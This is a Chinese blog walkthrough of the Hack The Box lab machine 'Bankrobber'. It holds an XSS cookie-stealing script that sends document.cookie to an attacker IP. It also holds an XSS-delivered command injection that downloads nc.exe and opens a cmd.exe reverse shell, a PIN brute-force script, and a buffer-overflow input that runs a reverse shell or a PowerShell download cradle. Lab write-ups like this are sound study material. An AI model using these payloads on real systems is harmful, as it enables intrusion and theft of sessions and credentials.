【Hack The Box】windows练习-- Bankrobber

最新推荐文章于 2023-08-30 17:18:01 发布
最新推荐文章于 2023-08-30 17:18:01 发布
阅读量303 收藏
点赞数
分类专栏: Hack The Box 文章标签: windows php apache Hack The Box 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_65527369/article/details/127657666
版权

HTB 学习笔记

【Hack The Box】windows练习-- Bankrobber

🔥系列专栏:Hack The Box
🎉欢迎关注🔎点赞👍收藏⭐️留言📝
📆首发时间:🌴2022年11月3日🌴
🍭作者水平很有限,如果发现错误,还望告知,感谢!

文章目录

在这里插入图片描述

信息收集

80/tcp   open  http         Apache httpd 2.4.39 ((Win64) OpenSSL/1.1.1b PHP/7.3.4)
|_http-server-header: Apache/2.4.39 (Win64) OpenSSL/1.1.1b PHP/7.3.4
|_http-title: E-coin
443/tcp  open  ssl/http     Apache httpd 2.4.39 ((Win64) OpenSSL/1.1.1b PHP/7.3.4)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10T23:48:47
|_Not valid after:  2019-11-08T23:48:47
|_http-server-header: Apache/2.4.39 (Win64) OpenSSL/1.1.1b PHP/7.3.4
| tls-alpn: 
|_  http/1.1
|_http-title: E-coin
445/tcp  open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
3306/tcp open  mysql        MariaDB (unauthorized)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows Server 2008 R2 (91%), Microsoft Windows 10 1511 - 1607 (87%), Microsoft Windows 8.1 Update 1 (86%), Microsoft Windows Phone 7.5 or 8.0 (86%), FreeBSD 6.2-RELEASE (86%), Microsoft Windows 10 1607 (85%), Microsoft Windows 10 1511 (85%), Microsoft Windows 7 or Windows Server 2008 R2 (85%), Microsoft Windows Server 2008 R2 or Windows 8.1 (85%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: BANKROBBER; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-time: 
|   date: 2022-11-02T11:46:53
|_  start_date: 2022-11-02T10:39:31
| smb2-security-mode: 
|   311: 
|_    Message signing enabled but not required

80存在apache,所以我们要关注php(特别关注)
443是一个https的apache,在80存在异常的时候,可能就是被跳转到https了
而后就是3306的MariaDB (unauthorized)
然后就是每次都会遇到的smb枚举
基本上我们在这个信息收集中获取的信息就这么多了

在这里插入图片描述
二者是同站,首先可以看到一个登陆框
简单分析一下网站功能,可以登陆可以注册,还可以交易
在这里插入图片描述
交易的话需要主交易人的账号以及被交易人的id
然后我尝试了一下用户密码均为admin的情况,可以登陆,然后就跳转到了转账页面(但是随便输入个啥都能登陆???这是什么鬼)
好了这个靶场到此结束,我去发财了【狗头保命】

哈哈哈,开个玩笑。那我觉得转账的过程肯定会调取数据库的信息来核对你的资金
结合开放了3306的数据库,那我觉得这里存在sql注入

然后我注册了个账户看看有啥区别
发现没啥区别,转账的话需要管理员审查
那就是数据库核对
更坚定了我sql注入的信心
我要开始尝试sql注入了
在这里插入图片描述
然后我准备随便转个账看看,发现选择框右边有箭头,账户和对方id都是自然数,不晓得干嘛
在这里插入图片描述试了几个常用的也没啥用
在这里插入图片描述
但我试了几种也没啥反应啊,那网站源码会不会在smb被暴露出来?我要去枚举看看

在这里插入图片描述smb也都锁了
在这里插入图片描述刚才nikto扫了一下那个转账页面,也没啥东西

到这路已经死了,smb也有密码锁定,登陆框我试了几个也都没用,我仔细回想,漏了啥,然后,想起来了,目录遍历

目录遍历

在这里插入图片描述发现一个admin,但是要验证
在这里插入图片描述

xss

说明需要认证,然后再回想,哪里还可能有问题,又想到了那句话,转账页面要给管理员看,那是不是意味着,存在xss?我们用个简单的脚本跑一下
xss构造

python3 -m http.server 80--本地开服务器让那边找你这个test.js
<script src="http://10.10.14.5/test.js"></script>

xss窃听脚本

function pwn() {
    var img = document.createElement("img");
    img.src = "http://10.10.14.19/xss?=" + document.cookie;
    document.body.appendChild(img);
}
pwn();

在这里插入图片描述
在这里插入图片描述

SG9wZWxlc3Nyb21hbnRpYw%3D%3D

在这里插入图片描述

sql注入

在这里插入图片描述
这tm就对了么,绝对的去数据库查了,必须是sql注入
在这里插入图片描述
但是手搞了半天
就是不行,我一会再来玩
接下来就要玩下面那个服务框

ssrf

在这里插入图片描述
发现啥命令都执行不了,只支持本地,那我们能不能再次利用xss来利用,让他的本地来执行命令

也是利用刚才的方法
本地写一个js脚本,然后把反弹脚本啥的还有nc放到同一目录

var request = new XMLHttpRequest();
var params = 'cmd=dir|powershell -c "iwr -uri 10.10.14.6/nc.exe -outfile %temp%\\nc.exe"; %temp%\\nc.exe -e cmd.exe 10.10.14.6 1234';
request.open('POST', 'http://localhost/admin/backdoorchecker.php', true);
request.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
request.send(params);

所有的参数都是抓包所得
在这里插入图片描述还是在之前那个存在xss的地方搞
<script src="http://10.10.14.6/shell.js"></script>
在这里插入图片描述
在这里插入图片描述发现了一个这个文件
在这里插入图片描述

C:\>bankv2.exe
bankv2.exe
Toegang geweigerd.  翻译过来是无权访问
因为无权访问,所以直接听端口是快捷的方法,大概率可以突破这个限制

溢出

查看一下端口,发现了一个我们不晓得的端口,为了连接这个端口服务,我们把它隧道到本地然后nc就可以玩了

netstat -ano | findstr LISTEN

打隧道我们使用Chisel
把windows客户端传过去

powershell -c "wget 10.10.14.6/chisel_windows_amd64.exe -o c.exe"

服务端
./chisel server -p 8000 --reverse
客户端
c.exe client 10.10.14.5:8000 R:910:localhost:910
然后即可监听910端口

在这里插入图片描述

在这里插入图片描述连接成功
在这里插入图片描述

pin爆破

在这里插入图片描述

#!/usr/bin/env python3

import socket
import sys


for i in range(10000):
    sys.stdout.write(f"\rTrying: {i:04d}")
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(('localhost', 910))
    s.recv(4096)
    s.send(f"{i:04d}\n".encode())
    resp = s.recv(4096)
    if not b"Access denied" in resp:
        print(f"\rFound pin: {i:04d}")
        break
    s.close()

溢出突破

首先发现存在溢出,因为他下面要执行的很显然截断了,我们可以用msf的验证,也可以数一下,都行
在这里插入图片描述

msf-pattern_create -l 40
msf-pattern_offset -q 0Ab1

在这里插入图片描述
在这里插入图片描述
然后我们输入32个a加上后面的命令即可

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\\Users\\Cortin\\AppData\\Local\\Temp\\nc.exe -e cmd.exe 10.10.14.6 8888
或者
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAApowershell iex(new-object net.webclient).downloadstring('http://10.10.14.7:8000/rev.ps1')

可以看到下图已经正确的执行命令了
在这里插入图片描述最终就可以拿到system

hackthebox-bankrobber(考点:xss/xsrf/端口转发/缓冲区溢出)
冬萍子癸水
04-18 769
nmap PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.39 ((Win64) OpenSSL/1.1.1b PHP/7.3.4) | http-methods: |_ Supported Methods: HEAD POST |_http-server-header: Apac...
HTB靶场系列 Windows靶机 Slio靶机
m0_57221101的博客
01-27 3449
这台机器涉及到了oracle数据库,之前完全没有涉猎过,借此机会也是熟悉了一下这个数据库的操作方法;以及涉及到了关于内存取证方面的知识,正好上一次在美亚杯只是粗浅的学习了一下取证大师,则此也是借此机会好好的学习了一下取证相关知识 勘探 nmap -sC -sV 10.10.10.82 Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-09 13:15 CST Nmap scan report for 10.10.10.82 Host is up (0
No.87-HackTheBox-windows-Bankrobber-Walkthrough渗透学习
qq_34801745的博客
04-27 669
** HackTheBox-windows-Bankrobber-Walkthrough ** 靶机地址:https://www.hackthebox.eu/home/machines/profile/209 靶机难度:初级(3.2/10) 靶机发布日期:2020年2月19日 靶机描述: Bankrobber is an Insane difficulty Windows machine feat...
HTB-oscplike-Bankrobber
m0_53302733的博客
04-11 1671
HTB-oscplike-Bankrobber insane难度的bankrobber 靶机IP 10.10.10.154 sudo nmap -sC -sV -A -p- --min-rate=5000 -Pn 10.10.10.154 80/tcp open http Apache httpd 2.4.39 ((Win64) OpenSSL/1.1.1b PHP/7.3.4) 443/tcp open ssl/http Apache httpd 2.4.39 ((Win
MSF 内网渗透(案例)
热门推荐
3569
06-03 2万+
0x00 前言虽然渗透,但是不常使用msf进行内网渗透,这篇刚好的弥补了 win 和 linux shell 和 msf 的对接的流程。原文 : https://mp.weixin.qq.com/s/sKXWjgaViYsCjG33-5Ey8Q0x01 案例分析实验环境:目标环境:10.0.0.0/24, 10.0.1.0/24攻击主机:10.0.0.5 (Kali), 10.0.0.7 (Win...
ATK&ck靶场系列二
最新发布
weixin_45778886的博客
08-30 300
ATK&CK
靶机渗透练习07-driftingblues7
hirak0的博客
04-14 704
靶机描述 靶机地址:https://www.vulnhub.com/entry/driftingblues-7,680/ Description get flags difficulty: easy about vm: tested and exported from virtualbox. dhcp and nested vtx/amdv enabled. you can contact me by email for troubleshooting or questions. 一、搭建靶机环境
Vulnstack 红队(一)
菜鸟的学习笔记
06-02 8358
Vulnstack 红队(一) 靶机为红日安全分享的靶机 靶机下载地址:http://vulnstack.qiyuanxuetang.net/vuln/detail/2/ 笔记参考资料如下: CSDN——谢公子 FreeBuf——红日安全团队专栏 CSDN——assless 序 本次网络环境为两个虚拟网络。 192.168.72.0/24为模拟公网环境。(Vmnet2) 192.168.52.0/24为模拟内网环境。(Vmnet1) 攻击者机器与win7的第一张网卡处于Vmnet1。(模拟公网) win7的
域渗透综合项目实战
干铮的博客
02-27 5470
1.项目网络拓扑 2.信息收集 netdiscover主机发现 sudo netdiscover -i eth0 -r 192.168.3.0/24 Nmap端口扫描 nmap -A 192.168.3.45 -p- -oN nmap.a
SMB渗透测试常规思路
redwand的博客
02-08 6101
在互联网上,几乎所有的windows主机都开启了文件共享功能,这个功能是通过smb协议来实现的,因此,作为渗透测试工程师对于smb协议的理解必须要全面且深刻。
Nmap-03:Nmap识别目标机器上服务的指纹
敲代码的乔帮主
09-15 6294
目录 1.服务指纹介绍 2.Nmap识别服务指纹 3.Nmap侵略性的探测 1.服务指纹介绍 为了确保有一个成功的渗透测试或者网络设备监控,必须需要知道目标系统中服务的指纹信息。服务指纹信息包括服务端口、服务名和版本等。 通过分析目标往Nmap中发送的数据包中某些协议标记、选项和数据,我们可以推断发送这些数据包的操作系统等。 Nmap通过向目标主机发送多个UDP与TCP数据包并分析其响应来进行操作系统指纹识别工作。 2.Nmap识别服务指纹 ...
一个完整的内网渗透是什么样子的
kali_Ma的博客
08-12 3981
0x00 前言 今天这篇文章将试图呈现一个完整的内网渗透过程。文章略长,如果感兴趣的话,请耐心阅读! 0x01 案例分析 实验环境: 目标环境:10.0.0.0/24, 10.0.1.0/24 攻击主机:10.0.0.5 (Kali), 10.0.0.7 (Windows) 渗透过程: 基本的主机探测: root@kali:~# nmap -sn 10.0.0.0/24 -oG online.txt root@kali:~# cat online.txt | grep -i up Host:
kali 2.0 linux中的Nmap的操作系统扫描功能
weixin_30323631的博客
05-17 197
  不多说,直接上干货!   可以使用-O选项,让Nmap对目标的操作系统进行识别。 msf > nmap -O 202.193.58.13 [*] exec: nmap -O 202.193.58.13 Starting Nmap 7.31 ( https://nmap.org ) at 2017-05-17 2...
数据库MariaDB的基本命令(1)
jing_root的博客
11-09 1万+
登录数据库 #mysql -hIP -u用户-p密码 本地可以直接mysql –uroot -p 忘记数据库root用户密码 #vim /etc/my.conf.d/server.conf //centos6 #vim /etc/my.cnf.d/server.cnf //centos7 添加skip-grant-tables,重启服务service mysqld restart或syst...
401 (Unauthorized) 未授权
weixin_45484574的博客
08-24 6011
第一次发博客 献给CSDN 这是我走上人生巅峰的第一步啊 大家一起见证我的巅峰之路 哇咔咔~~ 如有错误,欢迎指正补充 ~ 401(Unauthorized) 未授权 第一次遇到这个报错,各种百度,最后一个前端交流群的伙伴说打印我的token令牌看看 果然,是我的token有误,token是一串由字母和数字组成的字符串,是登录时后端给的 取到正确的token就请求成功啦 ...
linux下mariadb设置权限,mariadb(MySql)设置远程访问权限
weixin_30899023的博客
04-29 1217
【问题】mariadb(MySql)安装之后,本地连接mysql是可以的,但是远程的机器不能连接和访问。【解决】修改mysql远程连接的ip限制配置。【步骤】1.本地mysql客户端连接mysqlmysql -u root -p2.执行sql语句:新安装的数据库 可以设置 /etc/my.cnf skip-grant-tables=1(跳过密码验证)--使用mysql系统数据库us...
查看MariaDB(MYSQL)数据库中用户及其拥有权限
shmily129的专栏
04-06 1万+
(1)查询所有用户: SELECT DISTINCT CONCAT('User: ''',user,'''@''',host,''';') AS query FROM mysql.user; (2)查看数据库中具体某个用户的权限: 方法一: show grants for 'username'@'%'; 方法二: select * from mysql.user where use
Mariadb(MySql) 设置远程访问权限
lwplvx的专栏
01-26 1822
Mariadb(MySql) 设置远程访问权限 步骤: 1.本地mysql客户端连接mysql:# mysql -u root -p 2.执行sql语句:--使用mysql系统数据库 use mysql; --配置10.0.5.2可以通过root:123456访问数据库 MariaDB [mysql]> GRANT ALL PRIVILEGES ON *.* to `root
靶机渗透练习08-driftingblues7 (msf的简单利用)
Force~
03-31 878
1、主机探活 arp-scan -I eth0 -l (指定网卡扫) 扫描局域网所有设备(所有设备IP、MAC地址、制造商信息) masscan 192.168.111.0/24 -p 80,22 (masscan 扫描的网段 -p 扫描端口号) netdiscover -i eth0 -r 192.168.184.0/24 (netdiscover -i 网卡-r 网段) nmap -sn 192.168.111.0/24 2、端口扫描 nmap -sS -A -sV -T4 -p- 192.168
mariadb(mysql)[详解]
云原生运维圈
09-23 3076
安装:   [root@bogon ~]# yum install mariadb -y #客户端 [root@bogon ~]# yum install mariadb-server -y #服务端 启动服务: [root@bogon ~]# systemctl start mariadb [root@bogon ~]# ss -tnl | grep 33...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

人间体佐菲

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值